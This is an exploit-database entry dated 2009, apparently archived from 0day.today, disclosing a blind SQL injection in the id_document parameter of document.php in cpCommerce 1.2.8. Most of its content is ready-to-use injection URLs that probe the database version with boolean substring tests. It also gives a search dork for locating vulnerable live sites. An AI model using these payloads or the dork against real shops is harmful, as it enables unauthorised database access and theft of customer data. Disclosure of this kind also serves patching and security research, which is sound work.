id: 5050
date: 04/15/2009
title: cpCommerce 1.2.8 (id_document) Blind SQL Injection Vulnerability
author: NoGe
cves: 

================================================================
cpCommerce 1.2.8 (id_document) Blind SQL Injection Vulnerability
================================================================


==========================================================================================


  [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

       Software : cpCommerce version 1.2.8
       Vendor   : http://cpcommerce.cpradio.org/
       Download : http://cpcommerce.cpradio.org/downloads.php
       Author   : NoGe

==========================================================================================


  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id_document=[SQL]
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
       http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5



  [o] Dork

       "Powered by cpcommerce"


==========================================================================================



#  0day.today [2023-03-24]  #